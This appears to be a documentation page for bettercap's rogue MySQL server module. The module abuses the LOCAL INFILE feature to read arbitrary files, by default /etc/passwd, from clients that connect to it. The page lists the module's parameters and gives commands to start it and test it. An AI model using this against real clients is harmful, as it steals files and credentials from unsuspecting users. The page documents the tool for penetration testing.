Skip to content

mysql.server (rogue)

A rogue MySQL server that exploits the LOCAL INFILE vulnerability. Reads arbitrary files from connecting clients.

Start the rogue MySQL server.

Stop the rogue MySQL server.

ParameterDefaultDescription
mysql.server.address<interface address>Address to bind the mysql server to.
mysql.server.infile/etc/passwdFile you want to read. UNC paths are also supported.
mysql.server.outfileIf filled, the INFILE buffer will be saved to this path instead of being logged.
mysql.server.port3306Port to bind the mysql server to.

Start the server and read /etc/hosts from connecting clients:

Terminal window
sudo bettercap -eval "set mysql.server.infile /etc/hosts; mysql.server on"

Connect to test and see the file output in bettercap:

Terminal window
mysql -u root -h 192.168.1.123 -pasdsasad --enable-local-infile